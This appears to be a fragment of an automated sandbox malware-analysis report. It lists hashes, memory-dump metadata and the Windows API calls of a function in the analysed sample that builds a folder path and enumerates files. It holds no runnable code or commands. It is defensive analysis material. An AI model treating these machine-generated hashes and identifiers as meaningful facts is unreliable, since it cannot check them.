                                      • Opcode ID: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
                                      • Instruction ID: 435e47d99a68a60cc5746cb21b8f71e50488397b794716e085ba6dfc691b5c27
                                      • Opcode Fuzzy Hash: 0e70d8f007815c078199d768b3eb50a19077b8f7193eafda07f08b5b77a90090
                                      • Instruction Fuzzy Hash: B3D05B7190411D5BCB10EF64DD489EA7378EB55705F0041CAF40E97150FB349F858F55
                                      APIs
                                        • Part of subcall function 048D91D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 048D9202
                                      • lstrcat.KERNEL32(?,00000000), ref: 048D5431
                                      • lstrcat.KERNEL32(?,00421058), ref: 048D544E
                                      • lstrcat.KERNEL32(?,006D6FF8), ref: 048D5462
                                      • lstrcat.KERNEL32(?,0042105C), ref: 048D5474
                                        • Part of subcall function 048D4DC7: wsprintfA.USER32 ref: 048D4DE3
                                        • Part of subcall function 048D4DC7: FindFirstFileA.KERNEL32(?,?), ref: 048D4DFA
                                        • Part of subcall function 048D4DC7: StrCmpCA.SHLWAPI(?,00420FC4), ref: 048D4E28
                                        • Part of subcall function 048D4DC7: StrCmpCA.SHLWAPI(?,00420FC8), ref: 048D4E3E
                                        • Part of subcall function 048D4DC7: FindNextFileA.KERNEL32(000000FF,?), ref: 048D5034
                                        • Part of subcall function 048D4DC7: FindClose.KERNEL32(000000FF), ref: 048D5049
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                      • String ID:
                                      • API String ID: 2667927680-0
                                      • Opcode ID: 78196317b43d1ae5eb8e9dda45d5cf78e45a1aa527f945a7246ff9d6d1fdb0ea
                                      • Instruction ID: c5d79f88e4a653acf268e5c6c6aace9aa802221ad40b290780f3db0018b59b83
                                      • Opcode Fuzzy Hash: 78196317b43d1ae5eb8e9dda45d5cf78e45a1aa527f945a7246ff9d6d1fdb0ea
                                      • Instruction Fuzzy Hash: CB21C876D01218A7DB14FBB4EC85EE9333D9B54700F404B59B696D2190EEB46BC8CB92